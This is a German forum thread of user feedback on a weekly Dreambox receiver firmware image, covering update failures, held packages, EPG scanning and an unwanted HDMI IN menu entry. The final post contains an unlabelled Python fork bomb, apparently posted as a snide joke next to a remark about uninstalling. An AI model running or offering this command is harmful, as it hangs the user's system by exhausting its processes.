Angepinnt OE2.5: Rückmeldungen zum weekly Image für DM520/DM525/DM820 und DM7080

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Wo finde ich das Log? Oder muss man das aktivieren.
      Glücklicherweise habe ich vor den Update ein Vollbackup gemacht :D
      Leider kann man das nicht über Boardmittel (GUI) wiederherstellen :( (->warum eigentlich nicht?)
      Aber da gebe es ja was von gutemine :thumbsup: oder halt die normale Methode.

      Nun die Frage, wenn ich meine Box wieder in den funktionierenden Zustand versetzt habe, was kann ich dann tun, um erfolgreich upzudaten/-graden, bzw. um das Log zu ziehen.

      Danke,
      Michel
    • Wenn du ein Update machst, immer prüfen ob es auch komplett durchgelaufen ist. Manchmal kann es sein, dass eine Bestätigung / Abfrage verlangt wird, diese muss dann mit Ja oder Nein beantwortet werden, damit das Update weiter läuft.
      Im Paketmanager sind dies die Taste gelb und grün.

      Am besten über telnet mit dem Befehl up das Update durchführen.
    • Hatte gerade den Fall das durch ein auf "hold" gesetztes Paket nach dem Update im Paketmanager und Neustart mehrere Pakete wieder als aktualisierbar deklariert wurden, Webadmin zeigte alles korrekt an.

      Nach setzen auf "unhold" und neuerlichen Update des Paketes war der Spuk vorbei. Vielleicht noch ein Bug im Paketmanager?
    • RDR schrieb:

      Joey schrieb:

      Das sind soweit die empfohlenen Einstellungen. Hier funktioniert das damit auch wie es soll.
      Du kannst ja mal use time based... auf ja stellen und dann nochmal beobachten.
      Also heute morgen war der Fehler weg mit der alten Einstellung. Werde es weiter beobachten.
      Natürlich ist der Fehler dann weg. Die Time Based Einstellung führt ja dazu, dass die Box die einzelnen Sender immer einen fixen Zeitraum lang anspringt. Ohne diese Option wird genau solange gescannt, bis alle Daten vorhanden sind.

      Spannender wäre aber rauszufinden, warum die Box bei dir auf diesem Sender stehen bleibt. Dafür solltest du mal versuchen ein Log zu machen (manueller EPGrefresh evtl. mal probieren) und das dann bei DMM melden.
    • Hallo,

      Seit dem Update von gestern habe ich das "HDMI IN" im Hauptmenü.

      Kann ich da irgend wo was einstellen das es da wieder weg ist ?

      beim Plugin "HDMI IN" habe ich selber schon geschaut sehe da aber nix :(

      Weiss einer wie ich ich das da wieder weg bekomme ?
      Mfg Digi-Bit
    • hdmi-in plugin de-installieren ?
      Probleme kann man niemals mit derselben Denkweise lösen.

      ¯\_(ツ)_/¯

      "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."



    • Ich benuze es ja für den Fire Stick


      Nur will ich es nicht im HM sehen, das stellt man einmal ein und gut ist und wenn doch ist es noch bei NN2 menü drine also wieso im HM ?


      War es noch nie.....


      Kann man es ändern ? B I T T E :!: :denk:
      Mfg Digi-Bit
    • hmich schrieb:

      Digi-Bit schrieb:

      beim Plugin "HDMI IN" habe ich selber schon geschaut sehe da aber n
      in der Schweiz hätte es einen Volksentscheid gegeben, hier ist es warscheinlich nicht so demokratisch abgelaufen :D
      Hier wird ja kein feedback gegeben sondern nur gemault wenn was nicht so ist wie es beliebt.Ein User hat gefragt ich fand die idee gut und habs eingebaut und ich sehe beim besten willen keine nachteile dadurch.Und wers nicht will ihr wisst ja wie man deinstalliert.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !